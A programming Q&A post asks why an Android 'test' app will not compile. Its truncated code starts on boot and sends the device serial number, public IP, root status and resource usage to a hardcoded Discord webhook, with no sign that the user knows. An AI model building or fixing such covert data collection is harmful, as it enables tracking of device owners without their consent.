# Android app will not compile and dosent give any specific error

Tags: java, android, apk

Hi so recently I had some issues with really stupid and simple code for a testing out an android app the code is below if somebody can tell me where I make a mistake?

That is what's in the manifest file:

```xml
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="example.myapp">

    <uses-permission android:name="android.permission.READ_PHONE_STATE" />
    <uses-permission android:name="android.permission.GET_TASKS" />
    <uses-permission android:name="android.permission.KILL_BACKGROUND_PROCESSES" />

    <!-- other manifest declarations here -->

</manifest>
```

```java
import android.app.*;
import android.content.*;
import android.net.*;
import android.os.*;
import java.io.*;
import java.net.*;
import java.util.*;

public class BootReceiver extends BroadcastReceiver {
    @Override
    public void onReceive(Context context, Intent intent) {
        Intent serviceIntent = new Intent(context, InternetCheckService.class);
        context.startService(serviceIntent);
    }
}

public class InternetCheckService extends Service {
    private static final String WEBHOOK_URL = "https://discord.com/api/webhooks/1234567890/abcdefghijklmnopqrstuvwxyz";

    @Override
    public int onStartCommand(Intent intent, int flags, int startId) {
        ConnectivityManager connectivityManager = (ConnectivityManager) getSystemService(Context.CONNECTIVITY_SERVICE);
        NetworkInfo networkInfo = connectivityManager.getActiveNetworkInfo();
        if (networkInfo != null && networkInfo.isConnected()) {
            try {
                String publicIpAddress = getPublicIpAddress();
                String serialNumber = Build.getSerial();
                boolean isRooted = isDeviceRooted();
                float cpuUsage = getCpuUsage();
                float ramUsage = getRamUsage();
                String message = String.format("Device %s is online with IP address %s\n\nSystem Information:\nRooted: %s\nCPU Usage: %s%%\nRAM Usage: %s%%", serialNumber, publicIpAddress, isRooted ? "Yes" : "No", cpuUsage, ramUsage);
                sendWebhookMessage(WEBHOOK_URL, message);
            } catch (IOException e) {
                e.printStackTrace();
            }
        } else {
            Intent intent = new Intent(this, MainActivity.class);
            intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
            startActivity(intent);
        }
        return START_NOT_STICKY;
    }

    @Override
    public IBinder onBind(Intent intent) {
        return null;
    }

    private String getPublicIpAddress() throws IOException {
        URL url = new URL("https://api.ipify.org");
        HttpURLConnection connection = (HttpURLConnection) url.openConnection();
        connection.setRequestMethod("GET");
        BufferedReader reader = new BufferedReader(new InputStreamReader(connection.getInputStream()));
        String line = reader.readLine();
        reader.close();
        return line;
    }

    private boolean isDeviceRooted() {
        return checkRootMethod1() || checkRootMethod2() || checkRootMethod3();
    }

    private boolean checkRootMethod1() {
        String buildTags = android.os.Build.TAGS;
        return buildTags != null && buildTags.contains("test-keys");
    }

    private boolean checkRootMethod2() {
        String[] paths = {"/system/app/Superuser.apk", "/sbin/su", "/system/bin/su", "/system/xbin/su", "/data/local/xbin/su", "/data/local/bin/su", "/system/sd/xbin/su", "/system/bin/failsafe/su", "/data/local/su"};
        for (String path : paths) {
            if (new File(path).exists()) return true;
        }
        return false;
    }

    private boolean checkRootMethod3() {
        Process process = null;
        try {
            process = Runtime.getRuntime().exec(new String[]{"su", "-c", "id"});
            BufferedReader reader = new BufferedReader(new InputStreamReader(process.getInputStream()));
            String output = reader.readLine();
            reader.close();
            return output != null && output.contains("uid=0");
        } catch (IOException e) {
            e.printStackTrace();
        } finally {
            if (process != null) {
                process.destroy();
            }
        }
        return false;
    }

    private float getCpuUsage() {
        try {
            RandomAccessFile reader = new RandomAccessFile
```

I can't figure it out.

I tried to compile it several times with other variants of the same code and nothing.

Comment: Please [edit] your post and add the exact text of the error message, and also a compilable version of the code. (And please also fix the formatting)

Comment: Have you added <intent-filter><intent-filter> in the manifest file?

Comment: On command-line execute `./gradlew assemble` (Linux/Mac) or `gradlew asemble` (Windows) and you will get output including error messages`.